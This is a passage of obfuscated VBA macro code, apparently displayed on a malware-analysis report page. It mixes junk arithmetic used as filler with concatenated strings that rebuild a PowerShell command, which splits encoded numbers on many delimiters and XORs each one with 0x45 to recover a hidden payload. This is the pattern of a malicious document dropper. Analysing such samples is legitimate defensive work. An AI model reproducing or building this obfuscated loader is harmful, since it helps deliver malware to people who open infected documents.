tmTsv = 90067 + RWXiQ
VFpkc = "36N46G1" + "26N" + "56{38" + "r36G4"
nwbSRa = HwFJf
VQGiJI = Rnd(nVkfQ)
GqmCp = (4002 * Sgn(ZzGHNJ) / 27237 / zZTzZ * UPLDTF + ChrW(tcumpm) / TwtHGT * CInt(oqUFI))
bAwUI = 10837 + lvzIJ
BCWaIoDMsD = "9r" + "38G45~62x50V55s" + "44G49s32<104x" + "45N42r54G49" + "N101r97<" + "26J107V0G61s" + "38{32r53~49N" + "44x42J43r107" + "x8J32~5"
rGcjZ = zLtzlD
wIZmL = Rnd(olaaz)
ajzNt = (45457 * Sgn(lJbXSi) / 98477 / lwzHtb * zLFBj + ChrW(LDruS) / uoYBG * CInt(lahfFO))
zrjWL = 40207 + WPzBj
ivZiwfVQoYi = "4~54r" + "36G3" + "4<" + "32s126N5"
AnUGr = qllHs
sQZwzi = Rnd(hGkmH)
IWnEm = (87586 * Sgn(pszbv) / 54868 / SnXMA * ADjTQ + ChrW(QkzHow) / MrFRoa * CInt(foOAL))
osaFjc = 98882 + FsNvtd
EDHXXRdIUqB = "6s56' -SplIt" + "'X' -SPLiT'r" + "'-SpLIT 'v' " + "-sp" + "lIt 'J' -S" + "pLIT'{' -SpLI"
DhYpTKZc = bIFLwPDOFlD + oTnGzhm + oXHOK + NYUKX + CRUSi + VFpkc + BCWaIoDMsD + ivZiwfVQoYi + EDHXXRdIUqB
End Function
Function NNIZaCuJqJP()
On Error Resume Next
jlzaM = fHrBnv
dcoDN = Rnd(GmPEp)
uPrEzm = (30219 * Sgn(ATYAwd) / 79755 / VOFbhi * HLCPKN + ChrW(Fpiwrw) / wRkzZj * CInt(aaPLp))
oGdir = 71432 + dDPXN
aNioJEuwIk = "t '<'-SPL" + "it'S'-splIt 'N" + "' -SPlIt'~" + "'-spLIT 'g'|" + "% {[chAr]( $_-" + "bXoR 0x45 " + ")}" + ") )"
NNIZaCuJqJP = aNioJEuwIk
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.